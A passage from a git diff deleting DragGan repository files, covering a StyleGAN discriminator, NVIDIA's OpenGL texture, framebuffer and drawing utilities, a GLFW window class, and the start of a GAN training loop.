factor = 2 - p = (len(blur_kernel) - factor) + (kernel_size - 1) - pad0 = 
(p + 1) // 2 - pad1 = p // 2 - - layers.append(Blur(blur_kernel, pad=(pad0, pad1))) - - stride = 2 - self.padding = 0 - - else: - stride = 1 - self.padding = kernel_size // 2 - - layers.append( - EqualConv2d( - in_channel, - out_channel, - kernel_size, - padding=self.padding, - stride=stride, - bias=bias and not activate, - ) - ) - - if activate: - if bias: - layers.append(FusedLeakyReLU(out_channel)) - - else: - layers.append(ScaledLeakyReLU(0.2)) - - super().__init__(*layers) - - -class ResBlock(nn.Module): - def __init__(self, in_channel, out_channel, blur_kernel=[1, 3, 3, 1]): - super().__init__() - - self.conv1 = ConvLayer(in_channel, in_channel, 3) - self.conv2 = ConvLayer(in_channel, out_channel, 3, downsample=True) - - self.skip = ConvLayer( - in_channel, out_channel, 1, downsample=True, activate=False, bias=False - ) - - def forward(self, input): - out = self.conv1(input) - out = self.conv2(out) - - skip = self.skip(input) - out = (out + skip) / math.sqrt(2) - - return out - - -class Discriminator(nn.Module): - def __init__(self, size, channel_multiplier=2, blur_kernel=[1, 3, 3, 1]): - super().__init__() - - channels = { - 4: 512, - 8: 512, - 16: 512, - 32: 512, - 64: 256 * channel_multiplier, - 128: 128 * channel_multiplier, - 256: 64 * channel_multiplier, - 512: 32 * channel_multiplier, - 1024: 16 * channel_multiplier, - } - - convs = [ConvLayer(3, channels[size], 1)] - - log_size = int(math.log(size, 2)) - - in_channel = channels[size] - - for i in range(log_size, 2, -1): - out_channel = channels[2 ** (i - 1)] - - convs.append(ResBlock(in_channel, out_channel, blur_kernel)) - - in_channel = out_channel - - self.convs = nn.Sequential(*convs) - - self.stddev_group = 4 - self.stddev_feat = 1 - - self.final_conv = ConvLayer(in_channel + 1, channels[4], 3) - self.final_linear = nn.Sequential( - EqualLinear(channels[4] * 4 * 4, channels[4], activation='fused_lrelu'), - EqualLinear(channels[4], 1), - ) - - def forward(self, input): - out = self.convs(input) - - batch, channel, height, width = out.shape - group = min(batch, self.stddev_group) - stddev = out.view( - group, -1, self.stddev_feat, channel // self.stddev_feat, height, width - ) - stddev = torch.sqrt(stddev.var(0, unbiased=False) + 1e-8) - stddev = stddev.mean([2, 3, 4], keepdims=True).squeeze(2) - stddev = stddev.repeat(group, 1, height, width) - out = torch.cat([out, stddev], 1) - - out = self.final_conv(out) - - out = out.view(batch, -1) - out = self.final_linear(out) - - return out - diff --git a/spaces/DragGan/DragGan-Inversion/gui_utils/gl_utils.py b/spaces/DragGan/DragGan-Inversion/gui_utils/gl_utils.py deleted file mode 100644 index 922db6ff7c8643352334c36b83039b8d2dad8a0f..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan-Inversion/gui_utils/gl_utils.py +++ /dev/null @@ -1,455 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. 
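# ---------------------------------------------------------------------------
# Illustrative headless-rendering sketch (an annotation added here, not part
# of the deleted file). init_egl() below asserts that PYOPENGL_PLATFORM is
# already 'egl', so the environment variable has to be set before OpenGL (and
# therefore this module) is imported. The 64x64 buffer size and the
# `gui_utils.gl_utils` import path are assumptions for this sketch.
import os
os.environ['PYOPENGL_PLATFORM'] = 'egl'  # must happen before importing OpenGL

from gui_utils import gl_utils           # assumed repo-relative import path

gl_utils.init_egl()                                 # headless EGL + GL context
fb = gl_utils.Framebuffer(width=64, height=64)      # offscreen render target
with fb.bind():
    # ... issue GL draw calls here (e.g. Texture.draw() or draw_pixels()) ...
    pixels = gl_utils.read_pixels(64, 64)           # uint8 array, shape (64, 64, 3)
# ---------------------------------------------------------------------------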
- -import math -import os -import functools -import contextlib -import numpy as np -import OpenGL.GL as gl -import OpenGL.GL.ARB.texture_float -import dnnlib - -# ---------------------------------------------------------------------------- - - -def init_egl(): - # Must be set before importing OpenGL. - assert os.environ['PYOPENGL_PLATFORM'] == 'egl' - import OpenGL.EGL as egl - import ctypes - - # Initialize EGL. - display = egl.eglGetDisplay(egl.EGL_DEFAULT_DISPLAY) - assert display != egl.EGL_NO_DISPLAY - major = ctypes.c_int32() - minor = ctypes.c_int32() - ok = egl.eglInitialize(display, major, minor) - assert ok - assert major.value * 10 + minor.value >= 14 - - # Choose config. - config_attribs = [ - egl.EGL_RENDERABLE_TYPE, egl.EGL_OPENGL_BIT, - egl.EGL_SURFACE_TYPE, egl.EGL_PBUFFER_BIT, - egl.EGL_NONE - ] - configs = (ctypes.c_int32 * 1)() - num_configs = ctypes.c_int32() - ok = egl.eglChooseConfig(display, config_attribs, configs, 1, num_configs) - assert ok - assert num_configs.value == 1 - config = configs[0] - - # Create dummy pbuffer surface. - surface_attribs = [ - egl.EGL_WIDTH, 1, - egl.EGL_HEIGHT, 1, - egl.EGL_NONE - ] - surface = egl.eglCreatePbufferSurface(display, config, surface_attribs) - assert surface != egl.EGL_NO_SURFACE - - # Setup GL context. - ok = egl.eglBindAPI(egl.EGL_OPENGL_API) - assert ok - context = egl.eglCreateContext(display, config, egl.EGL_NO_CONTEXT, None) - assert context != egl.EGL_NO_CONTEXT - ok = egl.eglMakeCurrent(display, surface, surface, context) - assert ok - -# ---------------------------------------------------------------------------- - - -_texture_formats = { - ('uint8', 1): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_LUMINANCE, internalformat=gl.GL_LUMINANCE8), - ('uint8', 2): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_LUMINANCE_ALPHA, internalformat=gl.GL_LUMINANCE8_ALPHA8), - ('uint8', 3): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_RGB, internalformat=gl.GL_RGB8), - ('uint8', 4): dnnlib.EasyDict(type=gl.GL_UNSIGNED_BYTE, format=gl.GL_RGBA, internalformat=gl.GL_RGBA8), - ('float32', 1): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_LUMINANCE, internalformat=OpenGL.GL.ARB.texture_float.GL_LUMINANCE32F_ARB), - ('float32', 2): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_LUMINANCE_ALPHA, internalformat=OpenGL.GL.ARB.texture_float.GL_LUMINANCE_ALPHA32F_ARB), - ('float32', 3): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_RGB, internalformat=gl.GL_RGB32F), - ('float32', 4): dnnlib.EasyDict(type=gl.GL_FLOAT, format=gl.GL_RGBA, internalformat=gl.GL_RGBA32F), -} - - -def get_texture_format(dtype, channels): - return _texture_formats[(np.dtype(dtype).name, int(channels))] - -# ---------------------------------------------------------------------------- - - -def prepare_texture_data(image): - image = np.asarray(image) - if image.ndim == 2: - image = image[:, :, np.newaxis] - if image.dtype.name == 'float64': - image = image.astype('float32') - return image - -# ---------------------------------------------------------------------------- - - -def draw_pixels(image, *, pos=0, zoom=1, align=0, rint=True): - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - zoom = np.broadcast_to(np.asarray(zoom, dtype='float32'), [2]) - align = np.broadcast_to(np.asarray(align, dtype='float32'), [2]) - image = prepare_texture_data(image) - height, width, channels = image.shape - size = zoom * [width, height] - pos = pos - size * align - if rint: - pos = np.rint(pos) - fmt = get_texture_format(image.dtype, 
channels) - - gl.glPushAttrib(gl.GL_CURRENT_BIT | gl.GL_PIXEL_MODE_BIT) - gl.glPushClientAttrib(gl.GL_CLIENT_PIXEL_STORE_BIT) - gl.glRasterPos2f(pos[0], pos[1]) - gl.glPixelZoom(zoom[0], -zoom[1]) - gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1) - gl.glDrawPixels(width, height, fmt.format, fmt.type, image) - gl.glPopClientAttrib() - gl.glPopAttrib() - -# ---------------------------------------------------------------------------- - - -def read_pixels(width, height, *, pos=0, dtype='uint8', channels=3): - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - dtype = np.dtype(dtype) - fmt = get_texture_format(dtype, channels) - image = np.empty([height, width, channels], dtype=dtype) - - gl.glPushClientAttrib(gl.GL_CLIENT_PIXEL_STORE_BIT) - gl.glPixelStorei(gl.GL_PACK_ALIGNMENT, 1) - gl.glReadPixels(int(np.round(pos[0])), int( - np.round(pos[1])), width, height, fmt.format, fmt.type, image) - gl.glPopClientAttrib() - return np.flipud(image) - -# ---------------------------------------------------------------------------- - - -class Texture: - def __init__(self, *, image=None, width=None, height=None, channels=None, dtype=None, bilinear=True, mipmap=True): - self.gl_id = None - self.bilinear = bilinear - self.mipmap = mipmap - - # Determine size and dtype. - if image is not None: - image = prepare_texture_data(image) - self.height, self.width, self.channels = image.shape - self.dtype = image.dtype - else: - assert width is not None and height is not None - self.width = width - self.height = height - self.channels = channels if channels is not None else 3 - self.dtype = np.dtype(dtype) if dtype is not None else np.uint8 - - # Validate size and dtype. - assert isinstance(self.width, int) and self.width >= 0 - assert isinstance(self.height, int) and self.height >= 0 - assert isinstance(self.channels, int) and self.channels >= 1 - assert self.is_compatible( - width=width, height=height, channels=channels, dtype=dtype) - - # Create texture object. 
- self.gl_id = gl.glGenTextures(1) - with self.bind(): - gl.glTexParameterf( - gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_S, gl.GL_CLAMP_TO_EDGE) - gl.glTexParameterf( - gl.GL_TEXTURE_2D, gl.GL_TEXTURE_WRAP_T, gl.GL_CLAMP_TO_EDGE) - gl.glTexParameterf(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, - gl.GL_LINEAR if self.bilinear else gl.GL_NEAREST) - gl.glTexParameterf(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, - gl.GL_LINEAR_MIPMAP_LINEAR if self.mipmap else gl.GL_NEAREST) - self.update(image) - - def delete(self): - if self.gl_id is not None: - gl.glDeleteTextures([self.gl_id]) - self.gl_id = None - - def __del__(self): - try: - self.delete() - except: - pass - - @contextlib.contextmanager - def bind(self): - prev_id = gl.glGetInteger(gl.GL_TEXTURE_BINDING_2D) - gl.glBindTexture(gl.GL_TEXTURE_2D, self.gl_id) - yield - gl.glBindTexture(gl.GL_TEXTURE_2D, prev_id) - - def update(self, image): - if image is not None: - image = prepare_texture_data(image) - assert self.is_compatible(image=image) - with self.bind(): - fmt = get_texture_format(self.dtype, self.channels) - gl.glPushClientAttrib(gl.GL_CLIENT_PIXEL_STORE_BIT) - gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1) - gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, fmt.internalformat, - self.width, self.height, 0, fmt.format, fmt.type, image) - if self.mipmap: - gl.glGenerateMipmap(gl.GL_TEXTURE_2D) - gl.glPopClientAttrib() - - def draw(self, *, pos=0, zoom=1, align=0, rint=False, color=1, alpha=1, rounding=0): - zoom = np.broadcast_to(np.asarray(zoom, dtype='float32'), [2]) - size = zoom * [self.width, self.height] - with self.bind(): - gl.glPushAttrib(gl.GL_ENABLE_BIT) - gl.glEnable(gl.GL_TEXTURE_2D) - draw_rect(pos=pos, size=size, align=align, rint=rint, - color=color, alpha=alpha, rounding=rounding) - gl.glPopAttrib() - - def is_compatible(self, *, image=None, width=None, height=None, channels=None, dtype=None): # pylint: disable=too-many-return-statements - if image is not None: - if image.ndim != 3: - return False - ih, iw, ic = image.shape - if not self.is_compatible(width=iw, height=ih, channels=ic, dtype=image.dtype): - return False - if width is not None and self.width != width: - return False - if height is not None and self.height != height: - return False - if channels is not None and self.channels != channels: - return False - if dtype is not None and self.dtype != dtype: - return False - return True - -# ---------------------------------------------------------------------------- - - -class Framebuffer: - def __init__(self, *, texture=None, width=None, height=None, channels=None, dtype=None, msaa=0): - self.texture = texture - self.gl_id = None - self.gl_color = None - self.gl_depth_stencil = None - self.msaa = msaa - - # Determine size and dtype. - if texture is not None: - assert isinstance(self.texture, Texture) - self.width = texture.width - self.height = texture.height - self.channels = texture.channels - self.dtype = texture.dtype - else: - assert width is not None and height is not None - self.width = width - self.height = height - self.channels = channels if channels is not None else 4 - self.dtype = np.dtype(dtype) if dtype is not None else np.float32 - - # Validate size and dtype. 
- assert isinstance(self.width, int) and self.width >= 0 - assert isinstance(self.height, int) and self.height >= 0 - assert isinstance(self.channels, int) and self.channels >= 1 - assert width is None or width == self.width - assert height is None or height == self.height - assert channels is None or channels == self.channels - assert dtype is None or dtype == self.dtype - - # Create framebuffer object. - self.gl_id = gl.glGenFramebuffers(1) - with self.bind(): - - # Setup color buffer. - if self.texture is not None: - assert self.msaa == 0 - gl.glFramebufferTexture2D( - gl.GL_FRAMEBUFFER, gl.GL_COLOR_ATTACHMENT0, gl.GL_TEXTURE_2D, self.texture.gl_id, 0) - else: - fmt = get_texture_format(self.dtype, self.channels) - self.gl_color = gl.glGenRenderbuffers(1) - gl.glBindRenderbuffer(gl.GL_RENDERBUFFER, self.gl_color) - gl.glRenderbufferStorageMultisample( - gl.GL_RENDERBUFFER, self.msaa, fmt.internalformat, self.width, self.height) - gl.glFramebufferRenderbuffer( - gl.GL_FRAMEBUFFER, gl.GL_COLOR_ATTACHMENT0, gl.GL_RENDERBUFFER, self.gl_color) - - # Setup depth/stencil buffer. - self.gl_depth_stencil = gl.glGenRenderbuffers(1) - gl.glBindRenderbuffer(gl.GL_RENDERBUFFER, self.gl_depth_stencil) - gl.glRenderbufferStorageMultisample( - gl.GL_RENDERBUFFER, self.msaa, gl.GL_DEPTH24_STENCIL8, self.width, self.height) - gl.glFramebufferRenderbuffer( - gl.GL_FRAMEBUFFER, gl.GL_DEPTH_STENCIL_ATTACHMENT, gl.GL_RENDERBUFFER, self.gl_depth_stencil) - - def delete(self): - if self.gl_id is not None: - gl.glDeleteFramebuffers([self.gl_id]) - self.gl_id = None - if self.gl_color is not None: - gl.glDeleteRenderbuffers(1, [self.gl_color]) - self.gl_color = None - if self.gl_depth_stencil is not None: - gl.glDeleteRenderbuffers(1, [self.gl_depth_stencil]) - self.gl_depth_stencil = None - - def __del__(self): - try: - self.delete() - except: - pass - - @contextlib.contextmanager - def bind(self): - prev_fbo = gl.glGetInteger(gl.GL_FRAMEBUFFER_BINDING) - prev_rbo = gl.glGetInteger(gl.GL_RENDERBUFFER_BINDING) - gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, self.gl_id) - if self.width is not None and self.height is not None: - gl.glViewport(0, 0, self.width, self.height) - yield - gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, prev_fbo) - gl.glBindRenderbuffer(gl.GL_RENDERBUFFER, prev_rbo) - - def blit(self, dst=None): - assert dst is None or isinstance(dst, Framebuffer) - with self.bind(): - gl.glBindFramebuffer(gl.GL_DRAW_FRAMEBUFFER, - 0 if dst is None else dst.fbo) - gl.glBlitFramebuffer(0, 0, self.width, self.height, 0, 0, - self.width, self.height, gl.GL_COLOR_BUFFER_BIT, gl.GL_NEAREST) - -# ---------------------------------------------------------------------------- - - -def draw_shape(vertices, *, mode=gl.GL_TRIANGLE_FAN, pos=0, size=1, color=1, alpha=1): - assert vertices.ndim == 2 and vertices.shape[1] == 2 - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - size = np.broadcast_to(np.asarray(size, dtype='float32'), [2]) - color = np.broadcast_to(np.asarray(color, dtype='float32'), [3]) - alpha = np.clip(np.broadcast_to( - np.asarray(alpha, dtype='float32'), []), 0, 1) - - gl.glPushClientAttrib(gl.GL_CLIENT_VERTEX_ARRAY_BIT) - gl.glPushAttrib(gl.GL_CURRENT_BIT | gl.GL_TRANSFORM_BIT) - gl.glMatrixMode(gl.GL_MODELVIEW) - gl.glPushMatrix() - - gl.glEnableClientState(gl.GL_VERTEX_ARRAY) - gl.glEnableClientState(gl.GL_TEXTURE_COORD_ARRAY) - gl.glVertexPointer(2, gl.GL_FLOAT, 0, vertices) - gl.glTexCoordPointer(2, gl.GL_FLOAT, 0, vertices) - gl.glTranslate(pos[0], pos[1], 0) - gl.glScale(size[0], size[1], 1) 
- gl.glColor4f(color[0] * alpha, color[1] * alpha, color[2] * alpha, alpha) - gl.glDrawArrays(mode, 0, vertices.shape[0]) - - gl.glPopMatrix() - gl.glPopAttrib() - gl.glPopClientAttrib() - -# ---------------------------------------------------------------------------- - - -def draw_arrow(x1, y1, x2, y2, l=10, width=1.0): - # Compute the length and angle of the arrow - dx = x2 - x1 - dy = y2 - y1 - length = math.sqrt(dx**2 + dy**2) - if length < l: - return - angle = math.atan2(dy, dx) - - # Save the current modelview matrix - gl.glPushMatrix() - - # Translate and rotate the coordinate system - gl.glTranslatef(x1, y1, 0.0) - gl.glRotatef(angle * 180.0 / math.pi, 0.0, 0.0, 1.0) - - # Set the line width - gl.glLineWidth(width) - # gl.glColor3f(0.75, 0.75, 0.75) - - # Begin drawing lines - gl.glBegin(gl.GL_LINES) - - # Draw the shaft of the arrow - gl.glVertex2f(0.0, 0.0) - gl.glVertex2f(length, 0.0) - - # Draw the head of the arrow - gl.glVertex2f(length, 0.0) - gl.glVertex2f(length - 2 * l, l) - gl.glVertex2f(length, 0.0) - gl.glVertex2f(length - 2 * l, -l) - - # End drawing lines - gl.glEnd() - - # Restore the modelview matrix - gl.glPopMatrix() - -# ---------------------------------------------------------------------------- - - -def draw_rect(*, pos=0, pos2=None, size=None, align=0, rint=False, color=1, alpha=1, rounding=0): - assert pos2 is None or size is None - pos = np.broadcast_to(np.asarray(pos, dtype='float32'), [2]) - pos2 = np.broadcast_to(np.asarray(pos2, dtype='float32'), [ - 2]) if pos2 is not None else None - size = np.broadcast_to(np.asarray(size, dtype='float32'), [ - 2]) if size is not None else None - size = size if size is not None else pos2 - \ - pos if pos2 is not None else np.array([1, 1], dtype='float32') - pos = pos - size * align - if rint: - pos = np.rint(pos) - rounding = np.broadcast_to(np.asarray(rounding, dtype='float32'), [2]) - rounding = np.minimum( - np.abs(rounding) / np.maximum(np.abs(size), 1e-8), 0.5) - if np.min(rounding) == 0: - rounding *= 0 - vertices = _setup_rect(float(rounding[0]), float(rounding[1])) - draw_shape(vertices, mode=gl.GL_TRIANGLE_FAN, pos=pos, - size=size, color=color, alpha=alpha) - - -@functools.lru_cache(maxsize=10000) -def _setup_rect(rx, ry): - t = np.linspace(0, np.pi / 2, 1 if max(rx, ry) == 0 else 64) - s = 1 - np.sin(t) - c = 1 - np.cos(t) - x = [c * rx, 1 - s * rx, 1 - c * rx, s * rx] - y = [s * ry, c * ry, 1 - s * ry, 1 - c * ry] - v = np.stack([x, y], axis=-1).reshape(-1, 2) - return v.astype('float32') - -# ---------------------------------------------------------------------------- - - -def draw_circle(*, center=0, radius=100, hole=0, color=1, alpha=1): - hole = np.broadcast_to(np.asarray(hole, dtype='float32'), []) - vertices = _setup_circle(float(hole)) - draw_shape(vertices, mode=gl.GL_TRIANGLE_STRIP, pos=center, - size=radius, color=color, alpha=alpha) - - -@functools.lru_cache(maxsize=10000) -def _setup_circle(hole): - t = np.linspace(0, np.pi * 2, 128) - s = np.sin(t) - c = np.cos(t) - v = np.stack([c, s, c * hole, s * hole], axis=-1).reshape(-1, 2) - return v.astype('float32') - -# ---------------------------------------------------------------------------- diff --git a/spaces/DragGan/DragGan/gui_utils/glfw_window.py b/spaces/DragGan/DragGan/gui_utils/glfw_window.py deleted file mode 100644 index 83264eb89a855ec5038cf255994ee2b4b3ddb5ee..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan/gui_utils/glfw_window.py +++ /dev/null @@ -1,229 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & 
AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -import time -import glfw -import OpenGL.GL as gl -from . import gl_utils - -#---------------------------------------------------------------------------- - -class GlfwWindow: # pylint: disable=too-many-public-methods - def __init__(self, *, title='GlfwWindow', window_width=1920, window_height=1080, deferred_show=True, close_on_esc=True): - self._glfw_window = None - self._drawing_frame = False - self._frame_start_time = None - self._frame_delta = 0 - self._fps_limit = None - self._vsync = None - self._skip_frames = 0 - self._deferred_show = deferred_show - self._close_on_esc = close_on_esc - self._esc_pressed = False - self._drag_and_drop_paths = None - self._capture_next_frame = False - self._captured_frame = None - - # Create window. - glfw.init() - glfw.window_hint(glfw.VISIBLE, False) - self._glfw_window = glfw.create_window(width=window_width, height=window_height, title=title, monitor=None, share=None) - self._attach_glfw_callbacks() - self.make_context_current() - - # Adjust window. - self.set_vsync(False) - self.set_window_size(window_width, window_height) - if not self._deferred_show: - glfw.show_window(self._glfw_window) - - def close(self): - if self._drawing_frame: - self.end_frame() - if self._glfw_window is not None: - glfw.destroy_window(self._glfw_window) - self._glfw_window = None - #glfw.terminate() # Commented out to play it nice with other glfw clients. 
- - def __del__(self): - try: - self.close() - except: - pass - - @property - def window_width(self): - return self.content_width - - @property - def window_height(self): - return self.content_height + self.title_bar_height - - @property - def content_width(self): - width, _height = glfw.get_window_size(self._glfw_window) - return width - - @property - def content_height(self): - _width, height = glfw.get_window_size(self._glfw_window) - return height - - @property - def title_bar_height(self): - _left, top, _right, _bottom = glfw.get_window_frame_size(self._glfw_window) - return top - - @property - def monitor_width(self): - _, _, width, _height = glfw.get_monitor_workarea(glfw.get_primary_monitor()) - return width - - @property - def monitor_height(self): - _, _, _width, height = glfw.get_monitor_workarea(glfw.get_primary_monitor()) - return height - - @property - def frame_delta(self): - return self._frame_delta - - def set_title(self, title): - glfw.set_window_title(self._glfw_window, title) - - def set_window_size(self, width, height): - width = min(width, self.monitor_width) - height = min(height, self.monitor_height) - glfw.set_window_size(self._glfw_window, width, max(height - self.title_bar_height, 0)) - if width == self.monitor_width and height == self.monitor_height: - self.maximize() - - def set_content_size(self, width, height): - self.set_window_size(width, height + self.title_bar_height) - - def maximize(self): - glfw.maximize_window(self._glfw_window) - - def set_position(self, x, y): - glfw.set_window_pos(self._glfw_window, x, y + self.title_bar_height) - - def center(self): - self.set_position((self.monitor_width - self.window_width) // 2, (self.monitor_height - self.window_height) // 2) - - def set_vsync(self, vsync): - vsync = bool(vsync) - if vsync != self._vsync: - glfw.swap_interval(1 if vsync else 0) - self._vsync = vsync - - def set_fps_limit(self, fps_limit): - self._fps_limit = int(fps_limit) - - def should_close(self): - return glfw.window_should_close(self._glfw_window) or (self._close_on_esc and self._esc_pressed) - - def skip_frame(self): - self.skip_frames(1) - - def skip_frames(self, num): # Do not update window for the next N frames. - self._skip_frames = max(self._skip_frames, int(num)) - - def is_skipping_frames(self): - return self._skip_frames > 0 - - def capture_next_frame(self): - self._capture_next_frame = True - - def pop_captured_frame(self): - frame = self._captured_frame - self._captured_frame = None - return frame - - def pop_drag_and_drop_paths(self): - paths = self._drag_and_drop_paths - self._drag_and_drop_paths = None - return paths - - def draw_frame(self): # To be overridden by subclass. - self.begin_frame() - # Rendering code goes here. - self.end_frame() - - def make_context_current(self): - if self._glfw_window is not None: - glfw.make_context_current(self._glfw_window) - - def begin_frame(self): - # End previous frame. - if self._drawing_frame: - self.end_frame() - - # Apply FPS limit. - if self._frame_start_time is not None and self._fps_limit is not None: - delay = self._frame_start_time - time.perf_counter() + 1 / self._fps_limit - if delay > 0: - time.sleep(delay) - cur_time = time.perf_counter() - if self._frame_start_time is not None: - self._frame_delta = cur_time - self._frame_start_time - self._frame_start_time = cur_time - - # Process events. - glfw.poll_events() - - # Begin frame. - self._drawing_frame = True - self.make_context_current() - - # Initialize GL state. 
- gl.glViewport(0, 0, self.content_width, self.content_height) - gl.glMatrixMode(gl.GL_PROJECTION) - gl.glLoadIdentity() - gl.glTranslate(-1, 1, 0) - gl.glScale(2 / max(self.content_width, 1), -2 / max(self.content_height, 1), 1) - gl.glMatrixMode(gl.GL_MODELVIEW) - gl.glLoadIdentity() - gl.glEnable(gl.GL_BLEND) - gl.glBlendFunc(gl.GL_ONE, gl.GL_ONE_MINUS_SRC_ALPHA) # Pre-multiplied alpha. - - # Clear. - gl.glClearColor(0, 0, 0, 1) - gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT) - - def end_frame(self): - assert self._drawing_frame - self._drawing_frame = False - - # Skip frames if requested. - if self._skip_frames > 0: - self._skip_frames -= 1 - return - - # Capture frame if requested. - if self._capture_next_frame: - self._captured_frame = gl_utils.read_pixels(self.content_width, self.content_height) - self._capture_next_frame = False - - # Update window. - if self._deferred_show: - glfw.show_window(self._glfw_window) - self._deferred_show = False - glfw.swap_buffers(self._glfw_window) - - def _attach_glfw_callbacks(self): - glfw.set_key_callback(self._glfw_window, self._glfw_key_callback) - glfw.set_drop_callback(self._glfw_window, self._glfw_drop_callback) - - def _glfw_key_callback(self, _window, key, _scancode, action, _mods): - if action == glfw.PRESS and key == glfw.KEY_ESCAPE: - self._esc_pressed = True - - def _glfw_drop_callback(self, _window, paths): - self._drag_and_drop_paths = paths - -#---------------------------------------------------------------------------- diff --git a/spaces/DragGan/DragGan/stylegan_human/training/training_loop.py b/spaces/DragGan/DragGan/stylegan_human/training/training_loop.py deleted file mode 100644 index ddd0c15e226b0436048fee4469341e3fb653c71b..0000000000000000000000000000000000000000 --- a/spaces/DragGan/DragGan/stylegan_human/training/training_loop.py +++ /dev/null @@ -1,427 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Main training loop.""" - -import os -import time -import copy -import json -import pickle -import psutil -import PIL.Image -import numpy as np -import torch -import dnnlib -from torch_utils import misc -from torch_utils import training_stats -from torch_utils.ops import conv2d_gradfix -from torch_utils.ops import grid_sample_gradfix - -import legacy -from metrics import metric_main - -#---------------------------------------------------------------------------- - -def setup_snapshot_image_grid(training_set, random_seed=0): - rnd = np.random.RandomState(random_seed) - gw = np.clip(7680 // training_set.image_shape[2], 7, 32) - gh = np.clip(4320 // training_set.image_shape[1], 4, 32) - - # No labels => show random subset of training samples. - if not training_set.has_labels: - all_indices = list(range(len(training_set))) - rnd.shuffle(all_indices) - grid_indices = [all_indices[i % len(all_indices)] for i in range(gw * gh)] - - else: - # Group training samples by label. - label_groups = dict() # label => [idx, ...] 
- for idx in range(len(training_set)): - label = tuple(training_set.get_details(idx).raw_label.flat[::-1]) - if label not in label_groups: - label_groups[label] = [] - label_groups[label].append(idx) - - # Reorder. - label_order = sorted(label_groups.keys()) - for label in label_order: - rnd.shuffle(label_groups[label]) - - # Organize into grid. - grid_indices = [] - for y in range(gh): - label = label_order[y % len(label_order)] - indices = label_groups[label] - grid_indices += [indices[x % len(indices)] for x in range(gw)] - label_groups[label] = [indices[(i + gw) % len(indices)] for i in range(len(indices))] - - # Load data. - images, labels = zip(*[training_set[i] for i in grid_indices]) - return (gw, gh), np.stack(images), np.stack(labels) - -#---------------------------------------------------------------------------- - -def save_image_grid(img, fname, drange, grid_size): - lo, hi = drange - img = np.asarray(img, dtype=np.float32) - img = (img - lo) * (255 / (hi - lo)) - img = np.rint(img).clip(0, 255).astype(np.uint8) - - gw, gh = grid_size - _N, C, H, W = img.shape - img = img.reshape([gh, gw, C, H, W]) - img = img.transpose(0, 3, 1, 4, 2) - img = img.reshape([gh * H, gw * W, C]) - - assert C in [1, 3] - if C == 1: - PIL.Image.fromarray(img[:, :, 0], 'L').save(fname) - if C == 3: - PIL.Image.fromarray(img, 'RGB').save(fname) - -#---------------------------------------------------------------------------- - -def training_loop( - run_dir = '.', # Output directory. - training_set_kwargs = {}, # Options for training set. - data_loader_kwargs = {}, # Options for torch.utils.data.DataLoader. - G_kwargs = {}, # Options for generator network. - D_kwargs = {}, # Options for discriminator network. - G_opt_kwargs = {}, # Options for generator optimizer. - D_opt_kwargs = {}, # Options for discriminator optimizer. - augment_kwargs = None, # Options for augmentation pipeline. None = disable. - loss_kwargs = {}, # Options for loss function. - metrics = [], # Metrics to evaluate during training. - random_seed = 0, # Global random seed. - num_gpus = 1, # Number of GPUs participating in the training. - rank = 0, # Rank of the current process in [0, num_gpus[. - batch_size = 4, # Total batch size for one training iteration. Can be larger than batch_gpu * num_gpus. - batch_gpu = 4, # Number of samples processed at a time by one GPU. - ema_kimg = 10, # Half-life of the exponential moving average (EMA) of generator weights. - ema_rampup = 0.05, # EMA ramp-up coefficient. None = no rampup. - G_reg_interval = None, # How often to perform regularization for G? None = disable lazy regularization. - D_reg_interval = 16, # How often to perform regularization for D? None = disable lazy regularization. - augment_p = 0, # Initial value of augmentation probability. - ada_target = None, # ADA target value. None = fixed p. - ada_interval = 4, # How often to perform ADA adjustment? - ada_kimg = 500, # ADA adjustment speed, measured in how many kimg it takes for p to increase/decrease by one unit. - total_kimg = 25000, # Total length of the training, measured in thousands of real images. - kimg_per_tick = 4, # Progress snapshot interval. - image_snapshot_ticks = 50, # How often to save image snapshots? None = disable. - network_snapshot_ticks = 50, # How often to save network snapshots? None = disable. - resume_pkl = None, # Network pickle to resume training from. - resume_kimg = 0, # First kimg to report when resuming training. - cudnn_benchmark = True, # Enable torch.backends.cudnn.benchmark? 
